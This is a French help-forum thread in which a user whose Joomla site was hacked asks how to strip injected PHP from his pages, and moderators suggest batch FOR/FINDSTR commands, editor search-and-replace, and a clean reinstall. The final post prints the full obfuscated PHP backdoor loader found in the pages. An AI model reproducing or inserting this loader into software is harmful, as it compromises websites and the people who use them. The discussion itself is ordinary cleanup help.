Site Hacké avec injection code PHP
Fermé
tchao57
Messages postés
583
Date d'inscription
dimanche 12 avril 2009
Statut
Membre
Dernière intervention
15 octobre 2018
-
11 oct. 2018 à 13:01
tchao57 Messages postés 583 Date d'inscription dimanche 12 avril 2009 Statut Membre Dernière intervention 15 octobre 2018 - 15 oct. 2018 à 11:49
tchao57 Messages postés 583 Date d'inscription dimanche 12 avril 2009 Statut Membre Dernière intervention 15 octobre 2018 - 15 oct. 2018 à 11:49
A voir également:
- Site Hacké avec injection code PHP
- Site de telechargement - Accueil - Outils
- Site comme coco - Accueil - Réseaux sociaux
- Quel site remplace coco - Accueil - Réseaux sociaux
- Site pour vendre des objets d'occasion - Guide
- Code asci - Guide
4 réponses
jee pee
Messages postés
40705
Date d'inscription
mercredi 2 mai 2007
Statut
Modérateur
Dernière intervention
22 janvier 2025
9 501
11 oct. 2018 à 15:08
11 oct. 2018 à 15:08
Bonjour,
Si le code rajouté est toujours en début du fichier et qu'il fait toujours le même nombre de lignes, on pourrait utiliser la commande FOR avec un paramètre skip n lignes.
Et si tous les fichiers .php ne sont pas affectés, il faudrait trouver une chaine de caractères spécifique à ce code parasite, on pourrait alors trouver les fichiers concernés avec la commande FINDSTR
Si le code rajouté est toujours en début du fichier et qu'il fait toujours le même nombre de lignes, on pourrait utiliser la commande FOR avec un paramètre skip n lignes.
Et si tous les fichiers .php ne sont pas affectés, il faudrait trouver une chaine de caractères spécifique à ce code parasite, on pourrait alors trouver les fichiers concernés avec la commande FINDSTR
jee pee
Messages postés
40705
Date d'inscription
mercredi 2 mai 2007
Statut
Modérateur
Dernière intervention
22 janvier 2025
9 501
Modifié le 11 oct. 2018 à 16:44
Modifié le 11 oct. 2018 à 16:44
On dirait qu'il n'y a pas de caractère de fin de ligne, cela peut poser problème.
Tu devrais tester dans un .cmd (à la main c'est une autre syntaxe %% devient %) sur un des fichiers concernés pour voir si cela pourrait fonctionner
et aussi pour essayer de déterminer les fichiers concernés
si tout colle, il faudra combiner les 2
Tu devrais tester dans un .cmd (à la main c'est une autre syntaxe %% devient %) sur un des fichiers concernés pour voir si cela pourrait fonctionner
@echo off cd D:\Dev\Batch\b2\dira FOR /F "skip=1 tokens=1* delims=€" %%A IN (php2.php) DO echo %%A >>newphp2.php pause
et aussi pour essayer de déterminer les fichiers concernés
@echo off cd D:\Dev\Batch\b2\dira FOR /R %%i IN (*.php) DO FINDSTR /M "eidecok" %%i && echo ok %%i pause
si tout colle, il faudra combiner les 2
Sinon, tu peux ouvrir tous les fichiers .php dans notepad++ et dans la fonction remplacer, tu colle ce que tu veux supprimer et dans remplacer tu ne met rien. Cela effacera le code en question dans tous les php à condition qu'ils soient ouverts dans NP++ et que tu remplaces avec "remplacer dans tous les documents ouverts".
jordane45
Messages postés
38391
Date d'inscription
mercredi 22 octobre 2003
Statut
Modérateur
Dernière intervention
22 janvier 2025
4 731
11 oct. 2018 à 17:11
11 oct. 2018 à 17:11
Bonjour,
Ou il peut aussi ouvrir son dossier www dans netbeans et effectuer un rechercher remplacer directement dans toute l'arborescence (en filtrant, en plus, si il le souhaite, sur le fichiers php).
Ou il peut aussi ouvrir son dossier www dans netbeans et effectuer un rechercher remplacer directement dans toute l'arborescence (en filtrant, en plus, si il le souhaite, sur le fichiers php).
bg62
Messages postés
23671
Date d'inscription
samedi 22 octobre 2005
Statut
Modérateur
Dernière intervention
21 janvier 2025
2 392
12 oct. 2018 à 03:07
12 oct. 2018 à 03:07
pas de sauvegarde récente avant cet événement ???
tchao57
Messages postés
583
Date d'inscription
dimanche 12 avril 2009
Statut
Membre
Dernière intervention
15 octobre 2018
42
12 oct. 2018 à 14:00
12 oct. 2018 à 14:00
Non, malheureusement la personne qui gérait le site n'y avait...pas pensé...
Mais bon pas grave je vais réinstaller un Joomla tout neuf et retélécharger tous les composants et modules puis remettre la base de donnée. Ça nettoiera toute la vérole.
Mais bon pas grave je vais réinstaller un Joomla tout neuf et retélécharger tous les composants et modules puis remettre la base de donnée. Ça nettoiera toute la vérole.
Judge_DT
Messages postés
29395
Date d'inscription
vendredi 5 février 2010
Statut
Modérateur
Dernière intervention
23 octobre 2021
9 661
>
tchao57
Messages postés
583
Date d'inscription
dimanche 12 avril 2009
Statut
Membre
Dernière intervention
15 octobre 2018
12 oct. 2018 à 14:08
12 oct. 2018 à 14:08
Et... qui dit que la base de données, n'a pas elle aussi été vérolée ? ;-\
tchao57
Messages postés
583
Date d'inscription
dimanche 12 avril 2009
Statut
Membre
Dernière intervention
15 octobre 2018
42
15 oct. 2018 à 11:49
15 oct. 2018 à 11:49
Non je n'ai pas l'impression. Aucune nouvelle table n'est créée et tout semble aller à l'intérieur.
J'ai déjà fait un transfert sous wamp et tout roule. Pour l'instant... :)
J'ai déjà fait un transfert sous wamp et tout roule. Pour l'instant... :)
Modifié le 11 oct. 2018 à 16:03
Voici le code que je trouve dans mes pages PHP:
<?php $eidecok = '24- x24y7 x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x246Z6<.5`hA x27pd%6<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5cubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovgfxpmpusut!-#j0#!/!**#t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`" x63 162 x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; fu>?*2b%)gpf{jt)!gj!<*2bo); $qvlbdqs();}}]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-b<**#57]38y]47]67y]37]88yt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<XA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<*QDU##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]3#<!%w:!>!(%w:!>! x246767~6<Cw6<pd%w`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qjvt-#w#)ldbqov>*ofmy%);!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22epmqyf x27*&7-n%)utjm6< x7fw6*CW&)7gj#H#-#I#-#K#-#L#-#M#-##-#Y#-#D#-#W#-#C#-#O#-#N#*-bssbz)_x2425 x24- x24-!% x24- x24*!|! x24- x24if((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<64]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]SERVER[" x48 124 x54 120 x5f 125 xU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MS%:|:**t%)m%=*h%)m%):fmjix8:56985:6197g:74985-rr.93e:5597f-s.95h%/#0#/*#npd/#)rrd/#00;qpdof.)fepdof./#@#/qp%>5h%!<*::::tjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K7(!isset($GLOBALS[" x61 156 x75 1 x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj6x27tfs%6<*17-SFEBFI,6<*127-UVPFNJb%!**X)ufttj x22)gj!|!*nbsbq%) x24- x24]y8 x24- x24]26 x24- x24<%j,,*!| x24- x24gvodujpo! xA)qj3hopmA x273qj%6<*msvd}+;!>!} x27;!>>>!}_;gvc%}&q%7/7#@#7/7^#iubq# x5cq%FGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)3sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!id%)ftpmdR6<*id%)dfyfR t::!>! x24Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd193`{666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7f]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281;ftmbg} x7f;!osvufs}w;* x7f!>> x22!pd%)!gjppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)73:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86tusqpt)%z-#:#* x24- x24!>! x24/%tjw/ x24)% x24- x24y4j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%sgj!<**2-4-bubE{h%)sutcvubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,344ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%}X x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%*#cd2bge56+99386c6f+9f5d816:+946:ce44#- x24*<!~! x24/%t2w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%]); if ((strstr($uas," x6d 163 x69 145")) or (strstr($uas6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6<*K)ftpmdY%)fnbozcYufhA x272qj%6<^#zsfvr# x5c275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*# x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;zL1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid>}&epnbss-%rxW~!Ypp2)%zB%z>! x24/%58]24]31#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+9**-)1/2986+7*+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)! x22)!gj}1~!<2p% x7f!~!<#!%ff2-!%t::**<(<!fwbm)%tjw)# x24jw!>!#]y84]275]y83]242]48y]#>m%:|:*r%:-t%)3oftmbg!osvufs!|ftmf!~<**9.-j%56 x61"])))) { $GLOBALS[" x61 156 x75 156 x61"]=1; $uas=strtolower($_%<#462]47y]252]18y]#>q%<#762]67y]562]38y]57*W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce#-!#]y38#-!%w:**<")));$qvlbdqs = $xppyyai("", $dzmxeu<^#Y# x5cq% x27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfs-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<2epc}A;~!} x7f;!|!}{;)gj}l;33bq}k;#!>!2p%Z<^2 x5c2b%!>!2p%!*3uui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x27)fex7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d! x242178}527}88:}334}472 x24<!%ff2!>!opjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z23zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>53 105 x52 137 x41 107 x45 116 x54")zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSrting(0); $dzmxeuo = implode(array_map("hvxgblk",str_split("%t7eu{66~67<&w6<*&7-#o]s]o]s]#)f::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)s," x72 166 x3a 61 x31"))) { $xppyyai = utjm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!32M3]317]445]212]445]43]321]464]284]364]6]234]342],j%>j%!<**3-j%-bubE{h%)sutcw6* x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>sfopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#).fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*8]y83]256]y81]265]y72]254]y76dXk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<:>1<%j:=tj{fpg)%s:*<%V,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!> x5c%j^ x24- x24tvctus)% x24- x24b!>!%yy)#}#-# x24- x24-]27]28y]#/r%/h%)n%-#+I#)q%:>:r2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-y74]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:f:opjudovg<~ x24<!%o:!>%w6Z6<.2`hA x27pd%6<C x27pd%6|6.%7> x2272qj%)7gj6<**2qj%)hopm3qj*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#nction hvxgblk($n){return chr(ord($n)-1);} @error_repogj<*#k#)usbut`cpV x7f x7f x7f x7f<u%V x27{ftmfV *^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<;^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>sTrREvxNoiTCnuf_EtaerCxECalPer_Rtsrebyeqo'; $efljqgf=explode(chr((837-717)),substr($eidecok,(30712-24835),(208-174))); $krzjtyaj = $efljqgf[0]($efljqgf[(4-3)]); $ndezrekqr = $efljqgf[0]($efljqgf[(12-10)]); if (!function_exists('acfsfeo')) { function acfsfeo($gibxsim, $kckessqqs,$anjnapj) { $lfiushpz = NULL; for($ddxshxcnb=0;$ddxshxcnb<(sizeof($gibxsim)/2);$ddxshxcnb++) { $lfiushpz .= substr($kckessqqs, $gibxsim[($ddxshxcnb*2)],$gibxsim[($ddxshxcnb*2)+(3-2)]); } return $anjnapj(chr((29-20)),chr((434-342)),$lfiushpz); }; } $fitiqvxv = explode(chr((271-227)),'1124,59,1599,32,3687,69,1348,34,4368,35,2855,57,4598,39,352,66,5632,54,4459,24,4483,38,3615,21,4990,29,834,35,54,64,5520,32,4521,30,991,37,3085,63,2912,60,2972,31,723,42,869,52,5552,32,1812,21,3003,36,1863,24,1631,57,3885,55,5019,55,4921,69,1992,23,1688,33,1382,34,5095,40,2119,43,4749,70,288,64,1833,30,2334,42,5135,52,3659,28,3940,64,523,60,2603,43,4722,27,921,21,4637,35,2580,23,607,65,170,51,3558,25,4037,27,418,22,672,51,1477,25,4064,48,1502,32,4551,47,221,21,1923,69,5774,68,2753,38,4403,56,1887,36,4317,51,1721,30,4248,69,5842,35,3354,59,942,49,2057,62,3039,46,2376,46,3506,52,5686,48,4112,53,3148,67,4876,45,3251,54,4004,33,4203,45,118,52,2709,44,242,46,5428,69,583,24,5279,30,1416,25,4819,57,3756,43,3636,23,5497,23,4165,38,1077,47,5223,56,2469,53,1751,61,0,54,2791,64,2015,42,3799,33,5584,48,2646,63,3413,31,1183,52,3215,36,1534,65,1441,36,2422,47,457,66,2269,65,3305,49,2162,50,1235,51,2212,57,765,69,1286,62,4672,50,3444,62,5734,40,5074,21,2522,58,5187,36,5309,57,5366,62,1028,49,3583,32,3832,53,440,17'); $uhivuu = $krzjtyaj("",acfsfeo($fitiqvxv,$eidecok,$ndezrekqr)); $krzjtyaj=$eidecok; $uhivuu(""); $uhivuu=(582-461); $eidecok=$uhivuu-1; ?>Comment peut-on utiliser la commande FOR et skip?